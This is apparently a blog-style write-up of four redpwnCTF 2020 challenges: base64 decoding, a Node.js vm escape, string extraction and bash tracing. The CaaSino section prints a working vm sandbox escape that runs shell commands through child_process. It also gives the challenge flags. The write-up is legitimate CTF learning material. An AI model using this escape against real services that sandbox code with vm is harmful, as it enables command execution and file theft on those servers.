  • naut

redpwnCTF 2020 Writeups

This CTF is really interesting for all. I tried and failed many times and after reviewing the writeups, I just got a

.... because of the wrong direction =)). OK fine, keep trying hard next time :).


 

Base646464 [crypto]

The generate.js is shown below --> it just reads the flag and base64-encodes it 25 times.

const btoa = str => Buffer.from(str).toString('base64');

const fs = require("fs");
const flag = fs.readFileSync("flag.txt", "utf8").trim();

let ret = flag;
for(let i = 0; i < 25; i++) ret = btoa(ret);

fs.writeFileSync("cipher.txt", ret);

So to decode cipher.txt --> base64-decode the content 25 times.

This time, I tried CyberChef to decode this:

Solution (maximum jumps = 24 ~ a loop as 0<= i <= 24 (25 times))




CaaSino [Misc]

Description

Who needs regex for sanitization when we have VMs?!?!

The flag is at /ctf/flag.txt

nc 2020.redpwnc.tf 31273

Author: asphyxia

Given: calculator.js


This was my first time trying to break the Node.js vm module. The source code shows that whatever JavaScript we type at the prompt is run inside a VM (the Node.js vm module). The hint tells us the flag is at /ctf/flag.txt ==> just input JavaScript source code that reads /ctf/flag.txt


I was too lazy to learn Node.js at that time, so I searched a bit :P and luckily found a link with similar content


I read it and modified it a bit to get the flag content on the server side:


const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /ctf/flag.txt').toString()

==> flag{vm_1snt_s4f3_4ft3r_41l_29ka5sqD}

Thanks pwnisher for the writeup!



Ropes [rev]

This chal is an easy one; the hint tells us everything: "It's not just a string, it's a rope!"

==> get all strings in this binary to get the flag


strings ropes
# or
cat ropes

==> get two parts of flag --> join them ---> solved: flag{r0pes_ar3_just_l0ng_str1ngs}



Uglybash [misc]


This bash script evaluates to echo dont just run it, dummy # flag{...} where the flag is in the comments.

The comment won't be visible if you just execute the script. How can you mess with bash to get the value right before it executes?

Enjoy the intro misc chal.


This chal gives us an obfuscated bash script, the description gives us a hint that flag is in the comment # flag{}

So I just tried to debug this script with bash


bash -x cmd.sh 2> debug 1> output

Reviewing the output in a text editor, I found printf used many times ---> grep for it


grep printf debug | awk '{print $4}' | tr -d '\n'

==> got the flag in output


'echo'dont'just'run'it,'dummy''#''flag'{'us3_zsh,_dummy'}''# 

Flag: flag{us3_zsh_dummy}


